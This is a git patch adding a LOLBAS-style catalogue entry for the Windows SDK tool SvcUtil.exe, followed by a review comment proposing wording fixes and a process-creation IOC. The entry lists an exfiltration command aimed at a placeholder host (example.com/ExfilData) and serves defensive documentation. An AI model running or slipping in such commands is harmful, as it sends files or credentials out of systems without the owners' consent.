From 8533a8c90d7e6da855a3ae9ef1cf590914b3ca78 Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Thu, 25 Apr 2024 14:22:12 +0300 Subject: [PATCH] Add SvcUtil.yml --- yml/OtherMSBinaries/SvcUtil.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OtherMSBinaries/SvcUtil.yml diff --git a/yml/OtherMSBinaries/SvcUtil.yml b/yml/OtherMSBinaries/SvcUtil.yml new file mode 100644 index 000000000..0ac6bea43 --- /dev/null +++ b/yml/OtherMSBinaries/SvcUtil.yml @@ -0,0 +1,22 @@ +--- +Name: SvcUtil.exe +Description: ServiceModel Metadata Utility Tool included with the Microsoft Windows SDK +Author: Avihay Eldad +Created: 2024-04-25 +Commands: + - Command: SvcUtil.exe http://example.com/ExfilData + Description: Upload file, credentials or data exfiltration in general + Usecase: Exfilitrate data to remote server + Category: Upload + Privileges: User + MitreID: T1567 + OperatingSystem: Windows +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\{version}\bin\NETFX {version} Tools\SvcUtil.exe +Detection: + - IOC: SvcUtil making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad' + - Person: Yuval Saban + Handle: '@yuvalsaban3'
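Review bot: the `Usecase` line misspells "Exfilitrate"; it should read "Exfiltrate data to remote server". In the same hunk the `Description` under `Commands` mixes a verb phrase with a noun phrase ("Upload file, credentials or data exfiltration in general"); suggest "Upload files, credentials or other data to a remote server". The `Detection` section carries only one generic IOC ("SvcUtil making unexpected network connections or DNS requests"); since the command line in the entry itself passes an `http://` URL, a second IOC such as "SvcUtil.exe launched with an http:// or https:// argument on its command line" would give defenders a concrete process-creation observable to alert on alongside the network-based one. Finally, `Full_Path` uses `{version}` twice in one path, so a reader cannot tell whether the two placeholders refer to the same value; a short note, or separate SDK-version and NETFX-version placeholders, would make the path unambiguous.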